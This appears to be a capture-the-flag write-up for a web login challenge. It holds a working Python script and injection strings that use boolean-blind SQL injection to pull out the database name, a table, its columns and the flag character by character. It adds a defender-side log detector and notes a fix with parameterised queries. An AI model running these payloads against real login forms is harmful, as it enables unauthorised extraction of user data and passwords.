![b92891152de71b64fe8c98b10dd9d5e9.png](a0d32edf2beb46fe986bd6fc95f03dc5.png)
We're given a login form with nothing else to go on.
Testing the form, we get different responses depending on what we enter:
`admin:password` = `The password you entered was not valid`
`admin':password` = nothing
`admin'-- :password` = `The password you entered was not valid`
The differing responses look like a boolean-based blind SQLi.
Using this script, we're able to pull the database name one character at a time:
```python
import requests
import string

url = 'http://c0ntrol.threatsims.com:8888/'
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
}
found_chars = ''

# Recover the database name one character at a time: a guess is correct
# when the login falls through to the normal "password not valid" error.
while True:
    for i in string.printable:
        data = {
            "username": f"admin' AND substring(database(),1,{len(found_chars) + 1})='{found_chars + i}'#",
            "password": "as",
            "submit": ""
        }
        print('Trying ' + found_chars + i)
        r = requests.post(url, data=data, headers=headers)
        if 'The password you entered was not valid.' in r.text:
            print('Hit ' + i)
            found_chars += i
            break
    else:
        # No character matched: the full name has been recovered.
        break

print('Database name: ' + found_chars)
```
The database name is **ecorpdb**.
To get the table(s), we can use this injection in our script:
```
"username":f"admin' AND (substr((select table_name from information_schema.tables where table_schema='ecorpdb' limit 0,1),1,{len(found_chars) + 1})) = '{found_chars + i}'#",
```
The table name is **users**.
To get the columns, we can use this injection in our script:
```
"username":f"admin' AND (substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,{len(found_chars) + 1})) = '{found_chars + i}'#",
```
The columns are **flag**, **id** and **password**.
To get the data out of the columns, we can use this injection in our script:
```
"username":f"admin' AND (substr((select flag from users limit 0,1),1,{len(found_chars) + 1})) = '{found_chars + i}'#",
```
This gives us the flag:
`flag{g00d_ol_l0gin_sqli}`
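As an added defender-side example (not part of the original writeup): the extraction above leaves a recognisable trail in application logs, because every probe carries a `substring(`/`substr(` call whose length argument grows by one as characters are recovered. The script below runs over constructed sample log lines (the log format and the `username=` field capture are assumptions) and flags clients that send repeated probes, reporting how far the extraction got.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log lines (not from the original page): one POST per line,
# "<timestamp> <client-ip> username=<url-encoded username field>".
SAMPLE_LOG = """\
2021-05-20T10:00:01Z 198.51.100.7 username=admin
2021-05-20T10:00:02Z 198.51.100.7 username=admin%27+AND+substring%28database%28%29%2C1%2C1%29%3D%27a%27%23
2021-05-20T10:00:03Z 198.51.100.7 username=admin%27+AND+substring%28database%28%29%2C1%2C1%29%3D%27e%27%23
2021-05-20T10:00:04Z 198.51.100.7 username=admin%27+AND+substring%28database%28%29%2C1%2C2%29%3D%27ec%27%23
2021-05-20T10:00:05Z 198.51.100.7 username=admin%27+AND+%28substr%28%28select+flag+from+users+limit+0%2C1%29%2C1%2C3%29%29+%3D+%27fla%27%23
2021-05-20T10:00:06Z 203.0.113.9 username=alice
2021-05-20T10:00:07Z 203.0.113.9 username=bob%27s
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+username=(.*)$")
# substr()/substring() with a numeric start and a numeric length as the last
# two arguments; the length is what a char-by-char extraction increments.
PROBE_RE = re.compile(r"substr(?:ing)?\s*\(.*?,\s*\d+\s*,\s*(\d+)\s*\)", re.IGNORECASE)


def probe_length(username):
    """Return the substring length a probe asks for, or None if the value
    does not look like a boolean-blind probe (quote plus substr call)."""
    if "'" not in username:
        return None
    m = PROBE_RE.search(username)
    return int(m.group(1)) if m else None


def find_blind_probers(log_text, threshold=3):
    """Map each client that sent >= threshold probes to its probe count and
    the longest prefix length it asked for (how far extraction got)."""
    lengths = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _ts, client, raw = m.groups()
        n = probe_length(unquote_plus(raw))
        if n is not None:
            lengths[client].append(n)
    return {c: {"probes": len(v), "max_len": max(v)}
            for c, v in lengths.items() if len(v) >= threshold}


if __name__ == "__main__":
    for client, info in find_blind_probers(SAMPLE_LOG).items():
        print(f"{client}: {info['probes']} probes, longest prefix {info['max_len']}")
```

The oracle itself comes from the login returning a different response for a syntactically broken query than for a wrong password; a parameterised query plus a single generic login error removes it.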
---
Tags: #ctf #web #sqli #boolean-blind